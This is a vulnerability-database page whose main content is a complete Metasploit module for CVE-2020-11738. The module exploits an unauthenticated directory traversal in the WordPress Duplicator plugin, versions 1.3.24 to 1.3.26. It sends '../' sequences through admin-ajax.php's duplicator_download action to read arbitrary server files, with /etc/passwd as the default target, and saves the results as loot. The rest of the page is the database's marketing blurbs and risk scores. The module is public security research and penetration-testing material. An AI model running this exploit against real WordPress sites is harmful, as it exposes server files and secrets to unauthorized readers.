Lucene search
K

WordPress Duplicator File Read Vulnerability

🗓️ 19 Dec 2020 17:41:11Reported by Ramuel Gall, Hoa Nguyen - SunCSR TeamType 
metasploit
 metasploit
🔗 www.rapid7.com👁 52 Views

WordPress Duplicator File Read Vulnerability allows unauthenticated directory traversal in Duplicator plugin v1.3.24-1.3.26 for arbitrary file read with web server privileges

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Duplicator File Read Vulnerability',
        'Description' => %q{
          This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin
          'Duplicator' version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges.
          This vulnerability was being actively exploited when it was discovered.
        },
        'References' => [
          ['CVE', '2020-11738'],
          ['WPVDB', '10078'],
          ['URL', 'https://snapcreek.com/duplicator/docs/changelog']
        ],
        'Author' => [
          'Ramuel Gall', # Vulnerability discovery
          'Hoa Nguyen - SunCSR Team' # Metasploit module
        ],
        'DisclosureDate' => '2020-02-19',
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
        OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5])
      ]
    )
  end

  def check
    check_plugin_version_from_readme('duplicator_download', '1.3.27', '1.3.24')
  end

  def run_host(ip)
    traversal = '../' * datastore['DEPTH']
    filename = datastore['FILEPATH']
    filename = filename[1, filename.length] if filename =~ %r{^/}

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'vars_get' =>
                    {
                      'action' => 'duplicator_download',
                      'file' => "#{traversal}#{filename}"
                    }
    })

    fail_with Failure::Unreachable, 'Connection failed' unless res
    fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' if res.code != 200
    fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.empty?

    print_status('Downloading file...')
    print_line("\n#{res.body}\n")

    fname = datastore['FILEPATH']

    path = store_loot(
      'duplicator.traversal',
      'text/plain',
      ip,
      res.body,
      fname
    )
    print_good("File saved in: #{path}")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jan 2026 18:57Current
7.8High risk
Vulners AI Score7.8
CVSS 25
CVSS 3.17.5
CVSS 37.5
EPSS0.97822
52